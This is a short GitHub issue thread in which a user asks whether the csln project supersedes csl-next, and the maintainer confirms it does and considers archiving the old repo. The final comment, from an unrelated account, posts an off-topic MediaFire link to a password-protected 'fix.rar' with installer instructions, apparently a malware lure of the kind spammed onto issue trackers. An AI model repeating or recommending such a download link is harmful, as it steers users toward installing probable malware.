### ISSUE TITLE
Question: relation to bdarcus/csl-next

### ISSUE THREAD

**Issue by larsgw** [bdarcus/csln#157]
Does this supersede [`bdarcus/csl-next`](https://github.com/bdarcus/csl-next) or is it intended to work in conjunction?

**Comment by larsgw** [comment]
Nevermind, I see https://github.com/bdarcus/csl-next/issues/7 now

**Comment by bdarcus** [comment]
It effectively does supercede it. I should probably archive that repo.

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
